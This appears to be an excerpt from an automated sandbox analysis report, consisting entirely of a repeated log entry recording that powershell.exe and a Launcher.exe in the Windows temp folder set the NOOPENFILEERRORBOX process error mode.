            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
